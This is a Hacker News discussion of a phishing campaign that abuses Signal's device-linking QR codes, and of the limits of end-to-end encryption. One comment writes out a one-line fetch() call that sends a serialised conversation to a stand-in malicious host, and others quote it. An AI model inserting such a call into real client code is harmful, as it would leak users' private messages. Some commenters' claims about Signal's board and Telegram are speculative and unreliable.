Signal (and basically any app) with a linked-devices workflow has been risky for a while now. I touched on this last year (https://news.ycombinator.com/context?id=40303736) when Telegram was trash-talking Signal -- and its implementation of linked devices has been problematic for a long time: https://eprint.iacr.org/2021/626.pdf.

I'm only surprised it took this long for an in-the-wild attack to appear in open literature.

It certainly doesn't help that Signal themselves have discounted this attack (quoted from the IACR ePrint paper):

    "We disclosed our findings to the Signal organization on October 20, 2020, and received an answer on October 28, 2020. In summary, they state that they do not treat a compromise of long-term secrets as part of their adversarial model"
If I'm reading that right, the attack assumes the attacker has (among other things) a private key (IK) stored only on the user's device, and the user's password.

Thus, engaging in this attack would seem to require hardware access to one of the victim's devices (or some other backdoor), in which case you've already lost.

Correct me if I'm wrong, but that doesn't seem particularly dangerous to me? As always, security of your physical hardware (and not falling for phishing attacks) is paramount.

No, it means that if you approve a device to link, and you later have reason to unlink the device, you can't establish absolutely that the unlinked device can no longer access messages, or decrypt messages involving an account, breaking the forward-secrecy guarantees.

That leaves you with the only remedy for a Signal account that has accepted a link to a 'bad device' being to burn the whole account (maybe rotating safety numbers/keys would be sufficient; I am uncertain there). If you can prove the malicious link was only a link, then yeah, the attack I described is incomplete, but the issues in general with linked devices, and the remedies described, are the important bits, I think.

That's not what the attack does, though - they have access to your private key, so they can complete the linking protocol without your phone and add as many devices as they want (up to the allowed limit). If you add a bad device, you are screwed from that moment on, assuming you don't sync your chat history.

You can always see how many devices a user has: each has a unique integer id, so if I want to send you a message, I generate a new encrypted version for each device. If the UI does not show your devices properly then that is an oversight for sure, but I don't think that's the case anymore.

Either way, you'd have to trust that the Signal server is honest and tells you about all your devices. To avoid that, you need proofs that every Signal user has the same view of your account (keys), which is why key transparency is such an important feature.
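A minimal sketch of that per-device fan-out, just to make the mechanics concrete. All names here are made up, and the XOR "cipher" is only a placeholder; real Signal runs a Double Ratchet session per (account, device_id) pair:

```python
from dataclasses import dataclass

@dataclass
class Device:
    device_id: int          # each device has a unique integer id
    key: bytes              # per-device session key (stand-in)

def toy_encrypt(key: bytes, plaintext: bytes) -> bytes:
    # Placeholder "cipher": XOR with a repeating key (NOT secure).
    return bytes(p ^ key[i % len(key)] for i, p in enumerate(plaintext))

def fan_out(message: bytes, devices: list[Device]) -> dict[int, bytes]:
    # One ciphertext per registered device, addressed by device id.
    return {d.device_id: toy_encrypt(d.key, message) for d in devices}

devices = [Device(1, b"phone-key"), Device(2, b"desktop-key")]
envelopes = fan_out(b"hello", devices)
assert len(envelopes) == len(devices)
# XOR is its own inverse, so each device decrypts its own envelope.
assert toy_encrypt(devices[0].key, envelopes[1]) == b"hello"
```

The point of the sketch: the sender only fans out to the devices the server lists, which is exactly why a dishonest server (or an invisible extra device) is the thing key transparency has to rule out.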

That sounds exactly like what GP wrote.
That is really quite bad.
It sounds like all that's needed is a device that had been linked in the past. Unlinking doesn't have the security properties you'd think it would, and there's a phishing attack that makes scanning a QR code trigger a device link (which seems really, really bad if the user doesn't even have to take much action).
Your phone (primary device) and the linked ones have to share the IK, since that is the "root of trust" for your account: with that you generate new device keys, renew them, and so on.

Those keys are backed by Keystore on Android, and some similar system on Windows/Linux; I'd assume the same for macOS/iOS (but I don't know the details). So it's not as simple as just having access to your laptop - they'd need at least root.
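To illustrate why the IK is the root of trust: anyone holding it can mint (or re-derive) per-device keys. This is not Signal's actual KDF, just an HKDF-style sketch with made-up labels and salt:

```python
import hmac, hashlib

def hkdf_like(ik: bytes, info: bytes) -> bytes:
    # Simplified HKDF-style derivation (extract + expand collapsed into
    # two HMAC calls); real implementations follow RFC 5869.
    prk = hmac.new(b"device-key-salt", ik, hashlib.sha256).digest()
    return hmac.new(prk, info + b"\x01", hashlib.sha256).digest()

identity_key = b"long-term-identity-key"   # the IK; hypothetical value
phone_key = hkdf_like(identity_key, b"device:1")
desktop_key = hkdf_like(identity_key, b"device:2")

assert phone_key != desktop_key            # distinct keys per device
# Holding the IK is enough to reproduce any device key, which is why
# IK compromise is game over in this model.
assert hkdf_like(identity_key, b"device:1") == phone_key
```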

Phishing is always tricky, probably impossible to counter sadly - each one of us would be susceptible at the wrong moment.

I think the point is that as a user you expect revocation of trust to protect you going forward, yet it doesn't (e.g. the server shouldn't be forwarding new messages to the unlinked device). That's a design decision Signal made, but clearly it's one that leaves you open to harm. Moreover, it's a dangerous decision because after obtaining the IK in some way (e.g. a stolen device) you're able to essentially take over the account surreptitiously, without the user ever knowing (i.e. no phishing needed). As an end user these are surprising design choices, and that Signal discounted this as not part of their threat model suggests to me that their threat model has an intentional or unintentional hole; second-hand devices that aren't wiped are common, and jailbreaks exist.

This isn't intractable either. You could imagine various protocols where having the IK is insufficient for receiving new messages going forward or for sending messages impersonating the account. A simple one would be that each new device establishes a new key that the server recognizes as pertaining to that device; notifications are encrypted with a per-device key when sent to a device, and outbound messages are required to be similarly encrypted. There are probably better schemes than this naive approach.
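A toy version of that naive scheme (all names and the XOR "cipher" are placeholders): the server only delivers to devices whose per-device key is still registered, so revoking the key cuts off future messages. The hard part this sketch skips is making the server's device list verifiable rather than trusted:

```python
class ToyServer:
    # Hypothetical server-side registry: delivery requires a live
    # per-device key, so revoking the key cuts off future traffic.
    def __init__(self) -> None:
        self.device_keys: dict[int, bytes] = {}

    def register(self, device_id: int, key: bytes) -> None:
        self.device_keys[device_id] = key

    def revoke(self, device_id: int) -> None:
        self.device_keys.pop(device_id, None)

    def deliver(self, message: bytes) -> dict[int, bytes]:
        # Encrypt (placeholder XOR) only for currently registered devices.
        return {
            did: bytes(b ^ k[i % len(k)] for i, b in enumerate(message))
            for did, k in self.device_keys.items()
        }

server = ToyServer()
server.register(1, b"phone")
server.register(2, b"stolen")
assert set(server.deliver(b"hi")) == {1, 2}
server.revoke(2)                            # unlink the bad device...
assert set(server.deliver(b"hi")) == {1}    # ...and it gets nothing new
```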

Revocation of trust is always a tricky issue, you can look at TLS certificates to see what a can of worms that is.

The Signal server does not forward messages to your devices, and the list of devices someone has (including your own) can and has to be queried to communicate with them, since each device will establish unique keys signed by that IK. So it isn't as bad as having invisible devices that you'd never be aware of. That of course relies on you being able to ensure the server is honest and consistent, but this is work they already have in progress.

I think most of the issue here doesn't lie in the protocol design but in (1) how you "detect" the failure scenarios (like here, if your phone is informed a new device was added, without you pressing the Link button, you can assume something's phishy), (2) how do you properly warn people when something bad happens and (3) how do you inform users such that you both have a similar mental model. You also have to achieve these things without overwhelming them.

I would be surprised if there aren't ways to design it cryptographically to ensure that an unlinked device doesn't have access to future messages. The problem with how Signal has designed it is that it's a known weakness that Signal has dismissed in the past.
“Just install this chrome browser extension” is all it takes now. Hell, you can even access cookies and previously visited sites from within the browser. All it takes is some funky ad, or chrome extension, or some llama-powered toolbar to gain access to be able to do exactly that.

Background services on devices has been a thing for a while too. Install an app (which you grant all permissions to when asked) and bam, a self-restarting daemon service tracking your location, search history, photos, contacts, notes, email, etc

How is that related in any way to Signal?
My point is that anything you install on your device is a vector. It can mount MITM attacks, read your data, etc. Sidecar attacks.

This was classic phishing though

This is my read as well. Just double clicking here.
The attack in that paper assumes you have compromised the user's long term private identity key (IK) which is used to derive all the other keys in the signal protocol.

Outside of lab settings, the only way to do that is:

- (1) you get root access to the user's device
- (2) you compromise a recent chat backup

The campaign Google found is akin to phishing, so not as problematic on a technical level. How you warn someone they might be doing something dangerous is an entire can of worms in Usable Security... but it's gonna become even more relevant for Signal once adding a new linked device will also copy your message history (and the last 45 days of attachments).

If one doesn't use the linked device feature, does that impact this threat surface?
About the paper: if someone has gotten access to your identity (private) key, you are compromised, either with their attack (adding a linked device) or just getting MitM'ed and all messages decrypted. The attacker won.

The attack presented by Google is just classical phishing. In this case, if linked devices are disabled or don't exist, sure, you're safe. But if the underlying attack has a different premise (for example, "You need to update to this Signal apk here"), it could still work.

One thing I'm realizing more and more (I've been building an encrypted AI chat service which is powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. I mean, at the end of the day, you can put a one-line fetch/analytics-tracker/etc on the rendering side and everything your protocol claimed to do becomes useless. That even goes further, to the OS that the rendering is done on.

The last bit adds an interesting facet: even if you manage to open source the client and make it verifiably buildable by the user, you still need to distribute it on the iOS store. Anything can happen in the publish process. I use iOS as the example because it's particularly tricky to load your own build of an application.

And then if you did that, you still need to do it all on the other side of the chat too, assuming it's a multi-party chat.

You can have every cute protocol known to man, the best encryption algorithms on the wire, etc., but at the end of the day it's all trust.

I mention this because these days I worry more that using something like signal actually makes you a target for snooping under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop I'd focus my resources on Signal users, they have the most to hide.

Sometimes it all feels pointless (besides encrypted storage).

I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

You will always have to root your trust in something, assuming you cannot control the entire pipeline from the sand that becomes the CPU silicon, through the OS, and all the way to how packets are forwarded from you to the person on the other end.

This makes that entire goal moot; eliminating trust thus seems impossible, you're just shifting around the things you're willing to trust, or hide them behind an abstraction.

I think what will become more important is to have enough mechanisms to be able to categorically prove if an entity you trust to a certain extent is acting maliciously, and hold them accountable. If economic incentives are not enough to trust a "big guy", what remains is to give all the "little guys" a good enough loudspeaker to point distrust.

A few examples:

- certificate transparency logs, so your traffic is not MitM'ed
- reproducible builds, so the binary you get matches the public open source code you expect it does (regardless of its quality)
- key transparency, so when you chat with someone on WhatsApp/Signal/iMessage you actually get the public keys you expect and not the NSA's
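The reproducible-builds check is conceptually tiny: if rebuilding the open source tree yields a byte-identical artifact, verification collapses to one hash comparison (the published digest would ideally come from a transparency log). A sketch with made-up data:

```python
import hashlib

def verify_reproducible_build(local_binary: bytes, published_sha256: str) -> bool:
    # Reproducibility means an independent rebuild produces the exact
    # same bytes, so comparing one digest suffices to detect tampering.
    return hashlib.sha256(local_binary).hexdigest() == published_sha256

artifact = b"\x7fELF...pretend-binary"             # hypothetical build output
published = hashlib.sha256(artifact).hexdigest()   # what the project publishes

assert verify_reproducible_build(artifact, published)
assert not verify_reproducible_build(artifact + b"backdoor", published)
```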

> This makes that entire goal moot

I agree. Perhaps it's why I find discussions like nonce lengths and randomness sources almost insane (in the sense of willfully missing the forest for the trees). Intelligence agencies have managed to penetrate the most secretive and powerful organizations known to man. Why would one think Signal's supply chain is impervious? I'd assume the opposite.

But depending on your threat model, it can still be useful. If a state actor has a backdoor into something, would they burn that capability to get you? If you are a dissident in a totalitarian government, you would expect them to throw everything at you and not tell anyone how/why. If you are terrorizing and could be tried in a “classified” setting, you would expect them to throw everything at you. If you are Jane Average passing nudes and talking about doing a little Molly last weekend and would have a lawyer go through discovery, you are probably safe.
I don't think they are insane, they are quite useful when designing security mechanisms, while at the same time being utter noise for the end-user benefiting from that system.

> If you're building a chip to generate prime numbers, I surely hope you know how to select randomness or write constant-time, branch-free algorithms, just like an engineer designing elevators had better know the required tensile strength of the cable it'll use. In either case, it's mumbo jumbo for me, and I just need to get on with my day.

Part of what muddies the water is our collective inability to separate the two contexts, or empower tech communicators to do it. If we keep making new tech akin to esoteric magic, no one will board the elevator.

I almost find it worse. Using your analogy, it's akin to doing atomic simulations on the elevator cable quality while the elevator car is missing a floor.
I agree with you that the cart seems to be moving ahead of the horse, in that there is an increasing fixation on the theoretical status of the encryption scheme rather than the practical risk of various outcomes. An important facet of this is that systems that attempt to be too secure will prevent users from reading their own messages and hence will induce those users to use "less secure" systems. (This has been a problem on Matrix, where clients have often not clearly communicated to users that logging out can result in permanently missed messages.)

There's a part of me that wonders whether some of the more hardcore desiderata like perfect forward secrecy are, in practical terms, incompatible with what users want from messaging. What users want is "I can see all of my own messages whenever I want to and no one else can ever see any of them." This is very hard to achieve. There is a fundamental tension between "security" and things like password resets or "lost my phone" recovery.

I think if people fully understood the full range of possible outcomes, a fair number wouldn't actually want the strongest E2EE protection. Rather, what they want are promises on a different plane, such as ironclad legal guarantees (an extreme example being something like "if someone else looks at my messages they will go to jail for life"). People who want the highest level of technical security may have different priorities, but designing the systems for those priorities risks a backlash from users who aren't willing to accept those tradeoffs.

At a casual glance, any E2EE system can be reduced to your ironclad legally guaranteed (ILG) system by having the platform keep a copy of the key(s), for instance. So it doesn't have to be a one-or-the-other choice.
How does giving the platform the keys guarantee legal consequences for them if they use the keys to read your messages?
lmm · 1 day ago
> Sometimes it all feels pointless

Building anything that's meant to be properly secure - secure enough that you worry about the distinction between E2E encryption and client-server encryption - on top of iOS and Google Play Services is IMO pretty pointless yes. People who care about their security to that extent will put in the effort to use something other than an iPhone. (The way that Signal promoters call people who use cryptosystems they don't like LARPers is classic projection; there's no real threat model for which Signal actually makes sense, except maybe if you work for the US government).

> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

There's definitely a streetlight effect where academic cryptography researchers focus on the mathematical algorithms. Nowadays the circle of what you can get funding to do security research on is a little wider (toy models of the end to end messaging protocol, essentially) but still not enough to encompass the full human-to-human part that actually matters.

> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

I think your comment in general, and this part in particular, forgets what the state of telecommunications was 10-15 years ago. Nothing was encrypted. Doing anything on a public wifi was playing Russian roulette, and signals intelligence agencies were having the time of their lives.

The issues you are highlighting _are_ present, of course; they were just of a lower priority than network encryption.

I think that part of what you are talking about is sometimes called "attestation": basically a signature, with a root that you trust, that confirms beyond doubt the provenance of the entity (phone + OS + app) that you interact with.

Android has that and can confirm to a third party that the phone is running, for example, a locked bootloader with a Google signature and a Google OS. It would be technically possible to support a different chain of trust and get remote parties to accept a Google phone running LineageOS (as an example) as "original" software.

The last part is the app. You could in theory attest the signature on the app, which the OS has access to and could provide to the remote party if needed.

A fully transparent attested artifact, one that doesn't involve blind trust in an entity like Google, would use a ledger with hashes and binaries of the components being attested, instead of a signature-based root of trust.

All of the above are technically possible, but not implemented today in such a way to make this feasible. I'm confident that with enough interest this will be eventually implemented.
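A toy model of that chain of trust (hardware root signs the bootloader, each stage vouches for the next). HMAC stands in for real asymmetric signatures, and the key-handoff rule is invented purely for illustration:

```python
import hmac, hashlib

def sign(key: bytes, blob: bytes) -> bytes:
    # HMAC as a stand-in for a real asymmetric signature scheme.
    return hmac.new(key, blob, hashlib.sha256).digest()

def verify_chain(root_key: bytes, stages: list[tuple[bytes, bytes]]) -> bool:
    # stages: [(stage_image, signature_by_previous_stage), ...]
    # The first image must be signed by the hardware root of trust;
    # each later image by the stage before it.
    key = root_key
    for image, sig in stages:
        if not hmac.compare_digest(sign(key, image), sig):
            return False
        key = hashlib.sha256(image).digest()  # next verifier key (toy rule)
    return True

root = b"burned-into-silicon"                 # hypothetical root key
bootloader = b"bootloader-v1"
os_image = b"android-v15"
chain = [
    (bootloader, sign(root, bootloader)),
    (os_image, sign(hashlib.sha256(bootloader).digest(), os_image)),
]
assert verify_chain(root, chain)
chain[1] = (b"tampered-os", chain[1][1])      # swap the OS without re-signing
assert not verify_chain(root, chain)
```

Attesting the app would just extend the chain one more hop, with the OS vouching for the app's signature.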

> "E2E encryption" really requires the client to be built and verified by the end user

We probably agree that this is infeasible for the vast majority of people.

Luckily reproducible builds somewhat sidestep this in a more practical way.

I'll feel pessimistic like this, but then something like Tinfoil Chat [0] comes along and sparks my interest again. It's still all just theoretical to me, but at least I don't feel so bad about things.

With a little bit of hardware you could get a lot of assurance back: "Optical repeater inside the optocouplers of the data diode enforce direction of data transmission with the fundamental laws of physics."

[0] https://github.com/maqp/tfc

> "E2E encryption" really requires the client to be built and verified by the end user

But the OS might be compromised with a screen recorder or a keylogger. You'd need the full client, OS and hardware to be built by the end user. But then the client that they're sending to might be compromised... Or even that person might be compromised.

At the end of the day you have to put your trust somewhere, otherwise you can never communicate.

It’s primarily to guard against insider threats - E2E makes it very hard for one Signal employee to obtain everyone’s chat transcripts.

Anyone whose threat model includes well-resourced actors (like governments) should indeed be building their communications software from source in a trustworthy build environment. But then of course you still have to trust the hardware.

tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.

> tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.

This is sorta my point, lots of DC folks use Signal under the assumption they're protected from government snooping. Sometimes I feel like it could well have the opposite effect (via the selection bias of Signal users).

It is not plainly stated in the article, but as far as I understand, the first step of one of the attacks is to take the smartphone off a dead soldier’s body.
The article says they phish people into linking adversarial devices to their Signal:

> [...] threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, [...]

There's a new feature to sync old messages that seems like it could potentially make that attack vector ten times worse:

https://www.bleepingcomputer.com/news/security/signal-will-l...

Would a malicious URL be able to activate this feature as part of the request?

Probably not; in any normal design, a secondary device shouldn't have that kind of authority.

It is more concerning if the toggle is on by default and then you carelessly press next (on this or some other kind of phish).

Is this serious?

It raises questions about smartphones being standard equipment for soldiers, but they do give every soldier an effective, powerful computing and communication platform (one they already know how to use without additional training).

The question is how to secure them, including against the risk described in the parent. That seems like a high risk to me; I would expect someone is working on securing them well enough that even Russian intelligence doesn't have an effective exploit.

The solutions may apply well to civilian privacy too, if they ever become more widespread. It wouldn't be the worst idea to secure Ukrainian civilian phones against Russian attackers.

I seem to recall uploaded selfies being a frequent source of problems. For example: https://www.rferl.org/a/trench-selfies-tracking-russia-milit...
Phones aren’t secure but are more secure than the standard radios most have access to.

Encrypted milspec comms aren’t the standard in a massive war.

It’s weird but discord, signal and some mapping apps on smartphones are how this war is being fought.

> Encrypted milspec comms aren’t the standard in a massive war.

It is standard in any modern military that is actually prepared for war. It's not like encrypted digital radio is some kind of fancy tech, either - it's readily available to civilians.

Ukraine in particular started working on a wholesale switch to encrypted Motorola radios shortly after the war began in 2014, and by now it's standard equipment across their forces. Russia, OTOH, started the war without a good solution, with patchwork of ad hoc solutions originating from enthusiasts in the units - e.g. https://en.wikipedia.org/wiki/Andrey_Morozov was a vocal proponent.

But smartphones are more than communications. You can also use them as artillery computers for firing solutions, for example. And while normally there would be a milspec solution for this purpose, those are usually designed with milspec artillery systems and munitions in mind, while both sides in this war are heavily reliant on stocks that are non-standard (to them) - Ukraine, obviously, with all the Western aid, but Russia also had to dig out a lot of old equipment that was not adequately handled. Apps are much easier to update for this purpose, so they're heavily used in practice (and, again, these are often grassroots developments, not something pushed top-down by brass).

At the start of the invasion in Ukraine it was possible for a while to listen to unencrypted radio comms from Russian convoys, hosted online live.
dmix · 1 day ago
Russians apparently aren't allowed to bring phones to the front lines, but Ukrainians often still do, as they have the combat-management app which is critical to operations. I've always wondered if this is why there's far more published footage of Ukrainian combat video than Russian, beyond the donation incentive attached to videos when publishing them on Youtube/Telegram.
In the first weeks of the war you could see Russian armored columns clearly on Google Maps as heavy traffic (along with other military activity but the columns really stood out). https://www.theverge.com/2022/2/28/22954426/google-disables-...
> I've always wondered if this is why there's far more published footage of Ukrainian combat video than Russian.

I'm sure Russia's meat-wave tactics play more of a role. If you're sending your troops on suicide missions, including guys without weapons and even on crutches, you're not exactly keen on having them carry mobile phones to document the experience or even, heaven forbid, survive by surrendering.

[flagged]
This meat-wave meme needs to die. Again, if Ukrainians are being beaten by guys on crutches, it says so much about this NATO-armed and -trained force.
> This meatwave meme needs to die.

Are you sure it's a meme, though? There is plenty of footage out there documenting meat-wave tactics in 4K. Have you been living under a rock?

> Again ,if Ukrainians are being beaten by guy in crutches (...)

What's your definition of "being beaten"? Three years into Russia's 3-day invasion of Ukraine and Ukraine started invading and occupying Russian territory. Is this your definition of being beaten?

I'm not sure how applicable the NATO training is in this war. It's a trendsetter for sure
I think a large chunk of the footage is taken by gopros or similar, not smartphones.

And I think pretty much all published Ukrainian and Russian combat footage is vetted by their respective militaries (who would want to be court-martialed for Reddit karma?).

They just take different approaches to what, when, and where to release the footage.

Where is the fighting, and who runs the cellular networks in that area?

I’d want to run military communications on a network my side controls

A radio on a soldier is already a dangerous communications device - with a radio you can call in artillery strikes, for example.

There's no particular need IMO to secure smartphones on the battlefield in any way beyond standard countermeasures - i.e. encrypt the storage, use a passcode unlock.

The Russian military would beg to differ, see the sibling's comment: https://news.ycombinator.com/item?id=43106162
That's referring to people literally posting selfies online (with the result of giving away their location by either metadata or geo-guessing).

Which is a process-and-procedure issue more than a security issue on the phones themselves (except insofar as it's really obvious there's a solid need for a battlefield-device OS which strips all that stuff out by default).

Smartphones store data; radios (depending on the radio) do not. The Russian military likely has tools for bypassing typical security.
Soldiers are not allowed to carry a cell phone.
Is this suggesting that a single QR scan can on its own perform the device linking? If so, it seems like that's kind of the hole here, right? Like you shouldn't be able to scan a code that on its own links the device; you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)
> you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)

Remember that Signal is designed for non-technical users. Many/most do not understand QR codes, links, linking, etc, and they do not think much about it. They take an immediate, instinctive guess and click on something - often to get it off the screen so they can go back to what they were doing.

Do you have reason to think there is not confirmation? Maybe Signal's documentation will tell you.

> Do you have reason to think there is not confirmation?

The reason is just that in the article it says:

> threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance

That phrasing suggests to me that the scanning of the QR code, on its own, performs the linking. That may not be the case, but if so I'd say the wording is misleading or at least imprecise.

In fairness, I think it's misleading to you because of the details you are interested in. They don't say otherwise, and they can't lay out every detail anyone might be interested in; it's not an RFC.
> Maybe Signal's documentation will tell you.

Not the person you replied to, but I just tried googling half a dozen different terms and got results that have nothing to do with Signal.

> Remember that Signal is designed for non-technical users.

That does not prevent them from putting up a warning message that says "You just scanned a code which will allow another device to read all future messages sent to you, and send messages from your identity. Are you sure you want to do that?" And the button says "link devices", not "yes" or "no".

I think the frustration here is that Signal petulantly and paternalistically refuses to allow you to fully sync to another device (and for years refused to even allow you to back up messages) because supposedly we can't be trusted with such a thing...but then they leave the QR code system so idiotically designed it's apparently trivial to phish people into linking their devices to malicious actors?

Why the fuck does scanning a QR code, without having first selected "link device", even open that dialog? Or require a PIN code they obsessively force us to re-enter all the time?

It's obviously ripe for abuse.

We admonish people for piping a remote document into their shell but a QR code that links devices with one click is OK?

> That does not prevent them from putting up a warning message that says "You just scanned a code which will allow another device to read all future messages sent to you, and send messages from your identity. Are you sure you want to do that? And the button says "link devices", not "yes" or "no."

As an experiment, I just linked a device to my Signal account. After clicking "Link new device" in Signal, and then scanning the QR code, a dialog popped up: "Link this device? This device will be able to see your groups and contacts, access your chats, and send messages in your name. [Cancel] [Link new device]"

If I scan the QR code with Google Lens instead, it reads and displays the sgnl://linkdevice... URL but does not launch (or offer to launch) Signal.
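That confirmation gate is the whole defense, so here's a sketch of what a safe handler looks like: the scanned code only *proposes* a link, and nothing happens until the user explicitly confirms a dialog that spells out what linking grants. The handler, return strings, and URI details beyond the sgnl://linkdevice scheme are hypothetical:

```python
from urllib.parse import urlparse
from typing import Callable

def handle_scanned_qr(uri: str, confirm: Callable[[str], bool]) -> str:
    # A scanned code may only propose a device link; completing it
    # requires an explicit, informed confirmation from the user.
    parsed = urlparse(uri)
    if parsed.scheme != "sgnl" or parsed.netloc != "linkdevice":
        return "ignored: not a device-link code"
    warning = ("This device will be able to see your groups and contacts, "
               "access your chats, and send messages in your name.")
    if not confirm(warning):
        return "link cancelled"
    return "device linked"

# A group-invite (or any other) URL never reaches the linking path:
assert handle_scanned_qr("https://example.com/group-invite",
                         lambda w: True) == "ignored: not a device-link code"
# Even a genuine link URI does nothing without the user's confirmation:
assert handle_scanned_qr("sgnl://linkdevice?uuid=abc",
                         lambda w: False) == "link cancelled"
```

The phishing angle in the article is precisely about a victim clicking through such a dialog while believing they're joining a group, which is why the dialog text matters as much as its existence.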

The good news is that the target is targeted for a reason: it's still effective.
There are many voices which try to tell you that signal is compromised. Notice that all of those voices have less open-source-ness than Signal in virtually all cases.

Signal is doing its best to be a web scale company and also defend human rights. Individual dignity matters.

This is not a simple conversation.

> There are many voices which try to tell you that signal is compromised.

But compromised by whom? Russian or US intelligence? I am really confused.

I just looked quickly at the Signal Foundation website and the board members, and I read things like:

> Maher is a term member of the Council on Foreign Relations, a World Economic Forum Young Global Leader, and a security fellow at the Truman National Security Project.

> She is an appointed member of the U.S. Department of State's Foreign Affairs Policy Board

> She received her Bachelor's degree in Middle Eastern and Islamic Studies in 2005 from New York University's College of Arts and Science, after studying at the Arabic Language Institute of the American University in Cairo, Egypt, and Institut français d'études arabes de Damas (L'IFEAD) in Damascus, Syria.

Those types of people sound like part of the intelligence world to me. What exactly are they doing on the board of Signal (an open source messaging app)?

> This is not a simple conversation.

I agree

And Telegram is specifically bad here: it uses custom crypto on a custom protocol, has no E2EE by default whatsoever, and stores everything on its servers in plain text.
Also, it's a tricky environment of disinformation generally, and in particular for anything valuable like Signal. If Signal is secure, attackers on privacy would want people to believe Signal is compromised and to use something else. If it's not, then they would want people to believe Signal is secure.

I think the solution is to completely ignore any potential disinfo source, especially random people on social media (including HN). It's hard to do when that's where the social center is - you have to exclude yourself. Restrict yourself to legitimate, trusted voices.

I would also read it from another perspective. Attackers, especially at the level of nation states, will always try to get as many avenues for achieving their goals as possible.

If you have compromised a service, it would be in your interest to make it more popular (assuming you think you are the only one in possession of it).

If you cannot, you don't give up; you just go back to the drawing board (https://xkcd.com/538/). Maybe I don't need to break Signal if I can just rely on phishing or scare tactics to get what I want.

> web scale

I didn't realize anyone still used that term with a straight face.

"MongoDB is web scale, you turn it on and it scales right up."

I've struggled occasionally with trying to describe a similar concept without using that tainted term.
Am I reading this right? You can initiate device linking in Signal by clicking on an external URL? This is so stupid, I don't even have words for it. In a security-focused app you should not be able to link anything without manually going into the devices/link menu and clicking "link new device".
You can check for unexpected linked devices in the settings menu.
I wonder if Signal should expose linked devices directly in the UI at all times. Something like a small icon that indicates "You have 3 linked devices active" or similar.
Would probably lead to notification fatigue.

Showing a big snackbar when a new device is added is probably enough, especially if the app can detect there was no "action" on your phone that triggered it.

Key transparency, once rolled out, would help to ensure there is no lingering "bad" device around, but phishing will always be a problem.

"Would probably lead to notification fatigue."

Probably true...

> Showing a big snackbar when

A big... what?

Can you tell me what this new lingo is for someone who doesn't use the latest and shittiest marketing lingo?

> latest and shittiest marketing lingo

It has existed since Android 6: https://developer.android.com/reference/com/google/android/m...

Informative banner that does not require user interaction to dismiss.

Snackbar isn't a particularly new term, it goes back, IIRC, to the first version of Material Design and is similar to a toast but different in that snackbars may support interaction whereas toasts are non-interactive.
An in-app notification along the bottom of your screen. Usually just some text on a dark grey or black background.
> shittiest marketing lingo

Is that what you call the words you don't understand?

I think the trouble is that information overload is a bit of a thing in this case. It's information that is 99% of the time useless, except the one time it isn't. But also, to an informed user it is much less of a threat - the threat is anyone you interact with getting compromised.

EDIT: An analytics-based approach would probably be far more useful - for example, popping up a confirmation if GeoIP shows a new device is far removed from all the others, which for most people would only happen when they were traveling.
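A minimal sketch of that heuristic, assuming device locations come from GeoIP lookups; the 500 km threshold is an arbitrary assumption for illustration:

```python
# Flag a newly linked device whose GeoIP location is far from every
# existing device. Coordinates are (lat, lon) pairs; threshold is arbitrary.
from math import radians, sin, cos, asin, sqrt

def km_between(a: tuple, b: tuple) -> float:
    """Great-circle (haversine) distance in km between two (lat, lon) points."""
    lat1, lon1, lat2, lon2 = map(radians, (*a, *b))
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371 * asin(sqrt(h))

def looks_suspicious(new_device, existing_devices, threshold_km=500):
    # Suspicious only if the new device is far from ALL known devices.
    return all(km_between(new_device, d) > threshold_km for d in existing_devices)

# A device linking from Moscow while the only other device is in Kyiv:
print(looks_suspicious((55.75, 37.62), [(50.45, 30.52)]))  # True
```

As noted above, the weakness is travel: the heuristic trades false positives for travelers against catching the remote-attacker case.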

Great idea, I'll send you a QR code...
They provided some domains, but not all of them are taken. For example, signal-protect[.]host is available, kropyva[.]site is available, signal-confirm[.]site is registered in Ukraine. Some of them are registered in Russia.

Never trust a country at war—any side. Party A blames B, Party B blames A, but both have their own agenda.

>signal-confirm[.]site is registered in Ukraine

WHOIS data is usually fake, made-up information, so I don't know why you are using it to claim the domain is registered in Ukraine. Russia is also known to use stolen credentials, SIM cards, etc. from their neighbouring countries, including Ukraine, for things like this.

Then why should I trust the article at all? If WHOIS data is fake and stolen credentials are common (which I don't disagree with), I could register a domain, put your name on it, and make it look like you're behind the phishing. Would that make it true? After all, in war, deception is a legitimate tactic.
I believe you are making a mistake by thinking that since a malicious actor's domain is registered in Ukraine, it automatically must be doing something in the interests of Ukraine, or at least be known to its officials.

Lots of Russian state actors have no problems working from within Ukraine, alas. Add to this purely chaotic criminal actors who will go with the highest bidder, territories temporarily controlled by Russians that have people shuttle to Ukraine and back daily, and it becomes complicated very quickly.

Fair point. Just because a domain is registered in Ukraine doesn't mean it's acting in Ukraine's interests. But that works both ways. If Russian actors can operate from Ukraine, then Ukrainian actors (or others) can also operate from Russia, or at least make it look that way. Cyber attacks originating from Ukraine and targeting Russia aren't uncommon either, which only adds to the complexity of attribution.

